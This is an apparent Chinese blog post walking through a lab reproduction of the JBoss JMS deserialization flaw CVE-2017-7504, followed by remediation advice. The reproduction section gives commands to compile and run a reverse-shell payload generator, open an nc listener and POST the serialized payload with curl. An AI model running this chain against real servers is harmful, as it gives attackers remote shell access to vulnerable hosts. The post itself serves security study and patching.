JBossMQJMS 反序列化漏洞(CVE-2017-7504)

最新推荐文章于 2022-12-14 11:28:44 发布
最新推荐文章于 2022-12-14 11:28:44 发布
阅读量827 收藏 4
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全 系统安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61503377/article/details/125945108
版权

漏洞详情

JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的 HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java ⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。

影响范围

JBoss AS 4.x及之前版本

Docker靶场环境搭建

cd joobs
ls
cd CVE-2017-7504
ls
docker-compose up -d
docker ps

在这里插入图片描述

漏洞复现

  1. 访问靶场地址。
http://ip地址:8080

在这里插入图片描述

  1. 访问 http://192.1668.114.130:8080/jbossmq-httpil/HTTPServerILServlet ,若出现如下界面则存在漏洞
    在这里插入图片描述

  2. 使用攻击机下载对应的漏洞利用工具。

https://github.com/ianxtianxt/CVE-2015-7501/
  1. 进入目录执行
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

在这里插入图片描述

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
(IP是攻击机ip,port是要监听的端口)

在这里插入图片描述

  1. 使用nc打开端口监听
nc -lnvp 5555

在这里插入图片描述

  1. 再用之前生成的.ser文件,通过POST二进制数据上去,使用
    nc监听端口,即可拿到shell
curl http://目标ip:port/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

在这里插入图片描述

总结

1、在GitHub上面下载我们需要的漏洞poc。
2、下载执行生成二进制的payload文件。
3、设置接受shell的主机IP和端口
4、监听端口。
5、向被攻击服务器发送攻击Payload。

防护建议

  1. 升级到JBOSS AS7。

  2. 临时解决方案:

(1)不需要 http-invoker.sar 组件的用户可直接删除此组件。

(2)添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中:/*用于对 http invoker 组件进行访问控制。

曲折上升
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JBossMQJMS 序列漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 序列漏洞CVE-2017-7504)漏洞利用工具,方便我们进行漏洞利用getshell。
JBoss 4.x JBossMQ JMS 序列漏洞CVE-2017-7504)
锋刃科技的博客
06-18 1036
简介 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。 环境搭建 使用vulhub和docker快速搭建环境 cd vulhub/jboss/CVE-2017-7504 docker-compo
JBossMQ JMS 序列漏洞CVE-2017-7504)
weixin_51151498的博客
12-12 677
JBossMQ JMS 序列漏洞CVE-2017-7504)
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
Jackson 最新序列漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Weblogic+XML序列漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 序列漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
JBOSS序列漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的序列类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
jboss序列漏洞检测工具
02-15
jboss中间件的序列漏洞检测工具,可检测主机搭建的中间件并获得shell
JBoss序列漏洞CVE-2017-7504)
weixin_46411728的博客
09-05 1373
JBoss序列漏洞CVE-2017-7504)
【jboss漏洞复现】CVE-2017-7504序列漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization序列漏洞
serendipity1130的博客
08-31 883
CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列数据: javac -cp .:common
jboss/CVE-2017-7504
不知名白帽的博客
06-23 2112
jboss/CVE-2017-7504漏洞复现。
JBoss漏洞 - CVE-2017-7504
HAKUNAMATATATTA的博客
12-14 2311
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。
[Vulfocus解题系列] jboss 序列CVE-2017-7504)
00勇士王子的博客
07-11 956
漏洞介绍 名称: jboss 序列CVE-2017-7504) 描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件
CVE-2017-7504 (JBOSS序列漏洞)漏洞复现
Jerry____的博客
12-16 1835
CVE-2017-7504 (JBOSS序列漏洞)漏洞复现 一:漏洞原理 JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。 二:影响范围 JBoss AS 4.x及之前版本。 三:环境搭建 cd...
PHP序列漏洞 CVE-2016
最新发布
07-28
PHP序列漏洞CVE-2016是指在PHP的序列序列过程中存在的安全漏洞。该漏洞被标记为CVE-2016-7124和CVE-2016-7125。 该漏洞的根本原因是在PHP的序列过程中没有对恶意输入进行充分的验证和过滤,导致攻击者可以构造恶意的序列数据,触发代码执行或者其他不当行为。 攻击者可以通过在恶意序列数据中注入恶意代码,利用这个漏洞来执行任意代码、绕过访问控制、获取敏感信息等。这种漏洞可能导致严重后果,如服务器被入侵、数据泄露等。 为了修复这个漏洞,PHP开发团队在PHP 7.0.14、PHP 5.6.29和PHP 5.5.38版本中引入了一些安全修复措施,包括对序列输入进行验证和过滤,以及增强了一些相关函数的安全性。因此,如果你使用的是PHP的较新版本,那么你可能已经得到了修复。 为了保护自己的应用程序免受这个漏洞的影响,建议你及时更新PHP版本,并确保你的代码对用户输入进行充分的验证和过滤,尽可能避免使用不受信任的序列数据。同时,你也可以考虑使用其他安全措施,如输入过滤、安全编码等来增强应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

曲折上升

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值